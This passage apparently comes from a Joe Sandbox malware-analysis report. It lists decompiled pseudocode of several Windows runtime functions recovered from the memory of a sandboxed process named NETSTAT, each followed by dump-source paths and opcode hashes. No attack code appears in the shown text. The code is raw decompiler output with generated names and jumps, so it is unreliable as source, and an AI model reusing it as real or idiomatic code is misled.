                						if(_t80 != 0) {
                							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
                							_t77 = _v8;
                							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
                								E0341C8F7(_t66, _t77, 0);
                							}
                						}
                					} else {
                						_t80 = E0341DBD2(__ecx[0xb], _t74, __edx, _a4);
                					}
                					if(E03377D50() == 0) {
                						_t43 = 0x7ffe0380;
                					} else {
                						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                					}
                					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
                						goto L22;
                					} else {
                						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
                						goto L21;
                					}
                				} else {
                					_push(__ecx);
                					_push(_t80);
                					E0341A80D(__ecx[0xf], 9, __edx, _t80);
                					L22:
                					return _t80;
                				}
                			}











                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                • Instruction ID: f04c74b8e58efd2282b5b070e5a0aa4e17faa901d62b8ad13ae3c8ad91c8f1b4
                • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                • Instruction Fuzzy Hash: DD31F536200F406FD731DB69C884F6BBBAAEB85250F18425BE9468F741DA74D866C718
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 69%
                			E033D69A6(signed short* __ecx, void* __eflags) {
                				signed int _v8;
                				signed int _v16;
                				intOrPtr _v20;
                				signed int _v24;
                				signed short _v28;
                				signed int _v32;
                				intOrPtr _v36;
                				signed int _v40;
                				char* _v44;
                				signed int _v48;
                				intOrPtr _v52;
                				signed int _v56;
                				char _v60;
                				signed int _v64;
                				char _v68;
                				char _v72;
                				signed short* _v76;
                				signed int _v80;
                				char _v84;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				void* _t68;
                				intOrPtr _t73;
                				signed short* _t74;
                				void* _t77;
                				void* _t78;
                				signed int _t79;
                				signed int _t80;
                
                				_v8 =  *0x344d360 ^ _t80;
                				_t75 = 0x100;
                				_v64 = _v64 & 0x00000000;
                				_v76 = __ecx;
                				_t79 = 0;
                				_t68 = 0;
                				_v72 = 1;
                				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
                				_t77 = 0;
                				if(L03366C59(__ecx[2], 0x100, __eflags) != 0) {
                					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                					if(_t79 != 0 && E033D6BA3() != 0) {
                						_push(0);
                						_push(0);
                						_push(0);
                						_push(0x1f0003);
                						_push( &_v64);
                						if(E03399980() >= 0) {
                							E03372280(_t56, 0x3448778);
                							_t77 = 1;
                							_t68 = 1;
                							if( *0x3448774 == 0) {
                								asm("cdq");
                								 *(_t79 + 0xf70) = _v64;
                								 *(_t79 + 0xf74) = 0x100;
                								_t75 = 0;
                								_t73 = 4;
                								_v60 =  &_v68;
                								_v52 = _t73;
                								_v36 = _t73;
                								_t74 = _v76;
                								_v44 =  &_v72;
                								 *0x3448774 = 1;
                								_v56 = 0;
                								_v28 = _t74[2];
                								_v48 = 0;
                								_v20 = ( *_t74 & 0x0000ffff) + 2;
                								_v40 = 0;
                								_v32 = 0;
                								_v24 = 0;
                								_v16 = 0;
                								if(E0335B6F0(0x333c338, 0x333c288, 3,  &_v60) == 0) {
                									_v80 = _v80 | 0xffffffff;
                									_push( &_v84);
                									_push(0);
                									_push(_v64);
                									_v84 = 0xfa0a1f00;
                									E03399520();
                								}
                							}
                						}
                					}
                				}
                				if(_v64 != 0) {
                					_push(_v64);
                					E033995D0();
                					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
                					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
                				}
                				if(_t77 != 0) {
                					E0336FFB0(_t68, _t77, 0x3448778);
                				}
                				_pop(_t78);
                				return E0339B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
                			}

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • Opcode ID: 0f4629796051c0b6745c98a73a53ffc471ddf523e9255d8f9ecb4fb386d0e7d2
                • Instruction ID: a112e3421d6735dba2dea8732eb3117c3cb0d3a0908106c340b151930ee798de
                • Opcode Fuzzy Hash: 0f4629796051c0b6745c98a73a53ffc471ddf523e9255d8f9ecb4fb386d0e7d2
                • Instruction Fuzzy Hash: 95415EB6E003089FDB14DFA5D981BAEFBF8EF48714F14812AE854AB250DB759905CB50
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 85%
                			E03355210(intOrPtr _a4, void* _a8) {
                				void* __ecx;
                				intOrPtr _t31;
                				signed int _t32;
                				signed int _t33;
                				intOrPtr _t35;
                				signed int _t52;
                				void* _t54;
                				void* _t56;
                				unsigned int _t59;
                				signed int _t60;
                				void* _t61;
                
                				_t61 = E033552A5(1);
                				if(_t61 == 0) {
                					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                					_t54 =  *((intOrPtr*)(_t31 + 0x28));
                					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
                				} else {
                					_t54 =  *((intOrPtr*)(_t61 + 0x10));
                					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
                				}
                				_t60 = _t59 >> 1;
                				_t32 = 0x3a;
                				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
                					_t52 = _t60 + _t60;
                					if(_a4 > _t52) {
                						goto L5;
                					}
                					if(_t61 != 0) {
                						asm("lock xadd [esi], eax");
                						if((_t32 | 0xffffffff) == 0) {
                							_push( *((intOrPtr*)(_t61 + 4)));
                							E033995D0();
                							L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                						}
                					} else {
                						E0336EB70(_t54, 0x34479a0);
                					}
                					_t26 = _t52 + 2; // 0xddeeddf0
                					return _t26;
                				} else {
                					_t52 = _t60 + _t60;
                					if(_a4 < _t52) {
                						if(_t61 != 0) {
                							asm("lock xadd [esi], eax");
                							if((_t32 | 0xffffffff) == 0) {
                								_push( *((intOrPtr*)(_t61 + 4)));
                								E033995D0();
                								L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                							}
                						} else {
                							E0336EB70(_t54, 0x34479a0);
                						}
                						return _t52;
                					}
                					L5:
                					_t33 = E0339F3E0(_a8, _t54, _t52);
                					if(_t61 == 0) {
                						E0336EB70(_t54, 0x34479a0);
                					} else {
                						asm("lock xadd [esi], eax");
                						if((_t33 | 0xffffffff) == 0) {
                							_push( *((intOrPtr*)(_t61 + 4)));
                							E033995D0();
                							L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                						}
                					}
                					_t35 = _a8;
                					if(_t60 <= 1) {
                						L9:
                						_t60 = _t60 - 1;
                						 *((short*)(_t52 + _t35 - 2)) = 0;
                						goto L10;
                					} else {
                						_t56 = 0x3a;
                						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
                							 *((short*)(_t52 + _t35)) = 0;
                							L10:
                							return _t60 + _t60;
                						}
                						goto L9;
                					}
                				}
                			}

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • Opcode ID: ee7e5f9297228b42528d008e89f5f9631bffdd76031620de2eb104ab359b801a
                • Instruction ID: 84973409676de8abd392b56729a58dbdd7d3965044e48a268eea22ee8f030afc
                • Opcode Fuzzy Hash: ee7e5f9297228b42528d008e89f5f9631bffdd76031620de2eb104ab359b801a
                • Instruction Fuzzy Hash: 7831A031A51700EBDB25DB18CDC0FAAB779AF007A0F15462EF9564B9A0E760F841C790
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 78%
                			E0338A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                				intOrPtr _t35;
                				intOrPtr _t39;
                				intOrPtr _t45;
                				intOrPtr* _t51;
                				intOrPtr* _t52;
                				intOrPtr* _t55;
                				signed int _t57;
                				intOrPtr* _t59;
                				intOrPtr _t68;
                				intOrPtr* _t77;
                				void* _t79;
                				signed int _t80;
                				intOrPtr _t81;
                				char* _t82;
                				void* _t83;
                
                				_push(0x24);
                				_push(0x3430220);
                				E033AD08C(__ebx, __edi, __esi);
                				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
                				_t79 = __ecx;
                				_t35 =  *0x3447b9c; // 0x0
                				_t55 = L03374620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
                				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
                				if(_t55 == 0) {
                					_t39 = 0xc0000017;
                					L11:
                					return E033AD0D1(_t39);
                				}
                				_t68 = 0;
                				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
                				 *(_t83 - 4) =  *(_t83 - 4) & 0;
                				_t7 = _t55 + 8; // 0x8
                				_t57 = 6;
                				memcpy(_t7, _t79, _t57 << 2);
                				_t80 = 0xfffffffe;
                				 *(_t83 - 4) = _t80;
                				if(0 < 0) {
                					L14:
                					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                					L20:
                					L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
                					_t39 = _t81;
                					goto L11;
                				}
                				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
                					_t81 = 0xc000007b;
                					goto L20;
                				}
                				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
                					_t59 =  *((intOrPtr*)(_t83 + 8));
                					_t45 =  *_t59;
                					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
                					 *_t59 = _t45 + 1;
                					L6:
                					 *(_t83 - 4) = 1;
                					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
                					 *(_t83 - 4) = _t80;
                					if(_t68 < 0) {
                						_t82 =  *((intOrPtr*)(_t83 + 0xc));
                						if(_t82 == 0) {
                							goto L14;
                						}
                						asm("btr eax, ecx");
                						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                						if( *_t82 != 0) {
                							 *0x3447b10 =  *0x3447b10 - 8;
                						}
                						goto L20;
                					}
                					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
                					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
                					_t51 =  *0x344536c; // 0xb33ff0
                					if( *_t51 != 0x3445368) {
                						_push(3);
                						asm("int 0x29");
                						goto L14;
                					}
                					 *_t55 = 0x3445368;
                					 *((intOrPtr*)(_t55 + 4)) = _t51;
                					 *_t51 = _t55;
                					 *0x344536c = _t55;
                					_t52 =  *((intOrPtr*)(_t83 + 0x10));
                					if(_t52 != 0) {
                						 *_t52 = _t55;
                					}
                					_t39 = 0;
                					goto L11;
                				}
                				_t77 =  *((intOrPtr*)(_t83 + 8));
                				_t68 = E0338A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
                				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
                				if(_t68 < 0) {
                					goto L14;
                				}
                				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
                				goto L6;
                			}

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • Opcode ID: fc45d8d14c81f84ad6d24f8a10d12321ec8e4c3be8340368f7363126113f1313
                • Instruction ID: 4416f80b6275d0f539ed77d0c8c8f641e2aef573cee0d6daaf632b6f866a3db4
                • Opcode Fuzzy Hash: fc45d8d14c81f84ad6d24f8a10d12321ec8e4c3be8340368f7363126113f1313
                • Instruction Fuzzy Hash: 224159B9A10345DFCB15DF58C890BA9BBF1FB49704F1981AAE814AF348D778AD01DB90
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E03393D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
                				intOrPtr _v8;
                				char _v12;
                				signed short** _t33;
                				short* _t38;
                				intOrPtr* _t39;
                				intOrPtr* _t41;
                				signed short _t43;
                				intOrPtr* _t47;
                				intOrPtr* _t53;
                				signed short _t57;
                				intOrPtr _t58;
                				signed short _t60;
                				signed short* _t61;
                
                				_t47 = __ecx;
                				_t61 = __edx;
                				_t60 = ( *__ecx & 0x0000ffff) + 2;
                				if(_t60 > 0xfffe) {
                					L22:
                					return 0xc0000106;
                				}
                				if(__edx != 0) {
                					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
                						L5:
                						E03367B60(0, _t61, 0x33311c4);
                						_v12 =  *_t47;
                						_v12 = _v12 + 0xfff8;
                						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
                						E03367B60(0xfff8, _t61,  &_v12);
                						_t33 = _a8;
                						if(_t33 != 0) {
                							 *_t33 = _t61;
                						}
                						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
                						_t53 = _a12;
                						if(_t53 != 0) {
                							_t57 = _t61[2];
                							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
                							while(_t38 >= _t57) {
                								if( *_t38 == 0x5c) {
                									_t41 = _t38 + 2;
                									if(_t41 == 0) {
                										break;
                									}
                									_t58 = 0;
                									if( *_t41 == 0) {
                										L19:
                										 *_t53 = _t58;
                										goto L7;
                									}
                									 *_t53 = _t41;
                									goto L7;
                								}
                								_t38 = _t38 - 2;
                							}
                							_t58 = 0;
                							goto L19;
                						} else {
                							L7:
                							_t39 = _a16;
                							if(_t39 != 0) {
                								 *_t39 = 0;
                								 *((intOrPtr*)(_t39 + 4)) = 0;
                								 *((intOrPtr*)(_t39 + 8)) = 0;
                								 *((intOrPtr*)(_t39 + 0xc)) = 0;
                							}
                							return 0;
                						}
                					}
                					_t61 = _a4;
                					if(_t61 != 0) {
                						L3:
                						_t43 = L03374620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
                						_t61[2] = _t43;
                						if(_t43 == 0) {
                							return 0xc0000017;
                						}
                						_t61[1] = _t60;
                						 *_t61 = 0;
                						goto L5;
                					}
                					goto L22;
                				}
                				_t61 = _a4;
                				if(_t61 == 0) {
                					return 0xc000000d;
                				}
                				goto L3;
                			}

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • Opcode ID: f76c180f7832eed26e9d07c7a23078fe2ee99d21d275fc850ec23226fcb6d720
                • Instruction ID: 811041e31d23ae12c316c61ab7d5c07c409ce2dc54ea9e8fadf6f79e8a8c2891
                • Opcode Fuzzy Hash: f76c180f7832eed26e9d07c7a23078fe2ee99d21d275fc850ec23226fcb6d720
                • Instruction Fuzzy Hash: 8731AFBAA15614DFEB34CF29C8D1A6BBBE9EF45720709806EE845CB760E730D840C791
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 68%
                			E0337C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
                				signed int* _v8;
                				char _v16;
                				void* __ebx;
                				void* __edi;
                				signed char _t33;
                				signed char _t43;
                				signed char _t48;
                				signed char _t62;
                				void* _t63;
                				intOrPtr _t69;
                				intOrPtr _t71;
                				unsigned int* _t82;
                				void* _t83;
                
                				_t80 = __ecx;
                				_t82 = __edx;
                				_t33 =  *((intOrPtr*)(__ecx + 0xde));
                				_t62 = _t33 >> 0x00000001 & 0x00000001;
                				if((_t33 & 0x00000001) != 0) {
                					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
                					if(E03377D50() != 0) {
                						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                					} else {
                						_t43 = 0x7ffe0386;
                					}
                					if( *_t43 != 0) {
                						_t43 = E03428D34(_v8, _t80);
                					}
                					E03372280(_t43, _t82);
                					if( *((char*)(_t80 + 0xdc)) == 0) {
                						E0336FFB0(_t62, _t80, _t82);
                						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
                						_t30 = _t80 + 0xd0; // 0xd0
                						_t83 = _t30;
                						E03428833(_t83,  &_v16);
                						_t81 = _t80 + 0x90;
                						E0336FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
                						_t63 = 0;
                						_push(0);
                						_push(_t83);
                						_t48 = E0339B180();
                						if(_a4 != 0) {
                							E03372280(_t48, _t81);
                						}
                					} else {
                						_t69 = _v8;
                						_t12 = _t80 + 0x98; // 0x98
                						_t13 = _t69 + 0xc; // 0x575651ff
                						E0337BB2D(_t13, _t12);
                						_t71 = _v8;
                						_t15 = _t80 + 0xb0; // 0xb0
                						_t16 = _t71 + 8; // 0x8b000cc2
                						E0337BB2D(_t16, _t15);
                						E0337B944(_v8, _t62);
                						 *((char*)(_t80 + 0xdc)) = 0;
                						E0336FFB0(0, _t80, _t82);
                						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
                						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
                						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
                						 *(_t80 + 0xde) = 0;
                						if(_a4 == 0) {
                							_t25 = _t80 + 0x90; // 0x90
                							E0336FFB0(0, _t80, _t25);
                						}
                						_t63 = 1;
                					}
                					return _t63;
                				}
                				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
                				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
                				if(_a4 == 0) {
                					_t24 = _t80 + 0x90; // 0x90
                					E0336FFB0(0, __ecx, _t24);
                				}
                				return 0;
                			}

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                • Instruction ID: f85d2610e9a60aaa7e0c958a1bbbb528e19a91625a05667f032dd28da1e062c2
                • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                • Instruction Fuzzy Hash: 2D313E76A01646BEDB14EBB4C8D0BEAF768BF42104F08916AD41C9F201DB3C5945DBD0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 76%
                			E033D7016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
                				signed int _v8;
                				char _v588;
                				intOrPtr _v592;
                				intOrPtr _v596;
                				signed short* _v600;
                				char _v604;
                				short _v606;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				signed short* _t55;
                				void* _t56;
                				signed short* _t58;
                				signed char* _t61;
                				char* _t68;
                				void* _t69;
                				void* _t71;
                				void* _t72;
                				signed int _t75;
                
                				_t64 = __edx;
                				_t77 = (_t75 & 0xfffffff8) - 0x25c;
                				_v8 =  *0x344d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
                				_t55 = _a16;
                				_v606 = __ecx;
                				_t71 = 0;
                				_t58 = _a12;
                				_v596 = __edx;
                				_v600 = _t58;
                				_t68 =  &_v588;
                				if(_t58 != 0) {
                					_t71 = ( *_t58 & 0x0000ffff) + 2;
                					if(_t55 != 0) {
                						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
                					}
                				}
                				_t8 = _t71 + 0x2a; // 0x28
                				_t33 = _t8;
                				_v592 = _t8;
                				if(_t71 <= 0x214) {
                					L6:
                					 *((short*)(_t68 + 6)) = _v606;
                					if(_t64 != 0xffffffff) {
                						asm("cdq");
                						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
                						 *((char*)(_t68 + 0x28)) = _a4;
                						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
                						 *((char*)(_t68 + 0x29)) = _a8;
                						if(_t71 != 0) {
                							_t22 = _t68 + 0x2a; // 0x2a
                							_t64 = _t22;
                							E033D6B4C(_t58, _t22, _t71,  &_v604);
                							if(_t55 != 0) {
                								_t25 = _v604 + 0x2a; // 0x2a
                								_t64 = _t25 + _t68;
                								E033D6B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
                							}
                							if(E03377D50() == 0) {
                								_t61 = 0x7ffe0384;
                							} else {
                								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                							}
                							_push(_t68);
                							_push(_v592 + 0xffffffe0);
                							_push(0x402);
                							_push( *_t61 & 0x000000ff);
                							E03399AE0();
                						}
                					}
                					_t35 =  &_v588;
                					if( &_v588 != _t68) {
                						_t35 = L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
                					}
                					L16:
                					_pop(_t69);
                					_pop(_t72);
                					_pop(_t56);
                					return E0339B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
                				}
                				_t68 = L03374620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
                				if(_t68 == 0) {
                					goto L16;
                				} else {
                					_t58 = _v600;
                					_t64 = _v596;
                					goto L6;
                				}
                			}


                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0ce6e10501658a218415ac0a2c77030afa07e3232ba3029bad5a38237cc5b044
                • Instruction ID: 410151cf9cac4bdae735646c8b0c253e88b9376f3a1b4de233794457b16118a5
                • Opcode Fuzzy Hash: 0ce6e10501658a218415ac0a2c77030afa07e3232ba3029bad5a38237cc5b044
                • Instruction Fuzzy Hash: 9B31A476A047519FC320DF68DD81A6AB7E9FF88700F084A29F8959B690E734E904C7A5
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 92%
                			E0338A70E(intOrPtr* __ecx, char* __edx) {
                				unsigned int _v8;
                				intOrPtr* _v12;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				void* _t16;
                				intOrPtr _t17;
                				intOrPtr _t28;
                				char* _t33;
                				intOrPtr _t37;
                				intOrPtr _t38;
                				void* _t50;
                				intOrPtr _t52;
                
                				_push(__ecx);
                				_push(__ecx);
                				_t52 =  *0x3447b10; // 0x8
                				_t33 = __edx;
                				_t48 = __ecx;
                				_v12 = __ecx;
                				if(_t52 == 0) {
                					 *0x3447b10 = 8;
                					 *0x3447b14 = 0x3447b0c;
                					 *0x3447b18 = 1;
                					L6:
                					_t2 = _t52 + 1; // 0x9
                					E0338A990(0x3447b10, _t2, 7);
                					asm("bts ecx, eax");
                					 *_t48 = _t52;
                					 *_t33 = 1;
                					L3:
                					_t16 = 0;
                					L4:
                					return _t16;
                				}
                				_t17 = L0338A840(__edx, __ecx, __ecx, _t52, 0x3447b10, 1, 0);
                				if(_t17 == 0xffffffff) {
                					_t37 =  *0x3447b10; // 0x8
                					_t3 = _t37 + 0x27; // 0x2f
                					__eflags = _t3 >> 5 -  *0x3447b18; // 0x1
                					if(__eflags > 0) {
                						_t38 =  *0x3447b9c; // 0x0
                						_t4 = _t52 + 0x27; // 0x2f
                						_v8 = _t4 >> 5;
                						_t50 = L03374620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
                						__eflags = _t50;
                						if(_t50 == 0) {
                							_t16 = 0xc0000017;
                							goto L4;
                						}
                						 *0x3447b18 = _v8;
                						_t8 = _t52 + 7; // 0xf
                						E0339F3E0(_t50,  *0x3447b14, _t8 >> 3);
                						_t28 =  *0x3447b14; // 0x77e07b0c
                						__eflags = _t28 - 0x3447b0c;
                						if(_t28 != 0x3447b0c) {
                							L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                						}
                						_t9 = _t52 + 8; // 0x10
                						 *0x3447b14 = _t50;
                						_t48 = _v12;
                						 *0x3447b10 = _t9;
                						goto L6;
                					}
                					 *0x3447b10 = _t37 + 8;
                					goto L6;
                				}
                				 *__ecx = _t17;
                				 *_t33 = 0;
                				goto L3;
                			}


                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 622de194957ab8ba33fcd2130ba72e048099c404e84001d72dc113ec227700ed
                • Instruction ID: e07cc987f415d98d9b9bb9cd98d5ae98248edb409d055e245967e822e1ea68c5
                • Opcode Fuzzy Hash: 622de194957ab8ba33fcd2130ba72e048099c404e84001d72dc113ec227700ed
                • Instruction Fuzzy Hash: 4431C2B9600784AFD711EF48DCC0F257BF9FB84795F14096AF025AB248D3749902C791
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 95%
                			E0335AA16(signed short* __ecx) {
                				signed int _v8;
                				intOrPtr _v12;
                				signed short _v16;
                				intOrPtr _v20;
                				signed short _v24;
                				signed short _v28;
                				void* _v32;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				intOrPtr _t25;
                				signed short _t38;
                				signed short* _t42;
                				signed int _t44;
                				signed short* _t52;
                				signed short _t53;
                				signed int _t54;
                
                				_v8 =  *0x344d360 ^ _t54;
                				_t42 = __ecx;
                				_t44 =  *__ecx & 0x0000ffff;
                				_t52 =  &(__ecx[2]);
                				_t51 = _t44 + 2;
                				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
                					L4:
                					_t25 =  *0x3447b9c; // 0x0
                					_t53 = L03374620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
                					__eflags = _t53;
                					if(_t53 == 0) {
                						L3:
                						return E0339B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
                					} else {
                						E0339F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
                						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
                						L2:
                						_t51 = 4;
                						if(L03366C59(_t53, _t51, _t58) != 0) {
                							_t28 = E03385E50(0x333c338, 0, 0,  &_v32);
                							__eflags = _t28;
                							if(_t28 == 0) {
                								_t38 = ( *_t42 & 0x0000ffff) + 2;
                								__eflags = _t38;
                								_v24 = _t53;
                								_v16 = _t38;
                								_v20 = 0;
                								_v12 = 0;
                								E0338B230(_v32, _v28, 0x333c2d8, 1,  &_v24);
                								_t28 = E0335F7A0(_v32, _v28);
                							}
                							__eflags = _t53 -  *_t52;
                							if(_t53 !=  *_t52) {
                								_t28 = L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                							}
                						}
                						goto L3;
                					}
                				}
                				_t53 =  *_t52;
                				_t44 = _t44 >> 1;
                				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
                				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
                					goto L4;
                				}
                				goto L2;
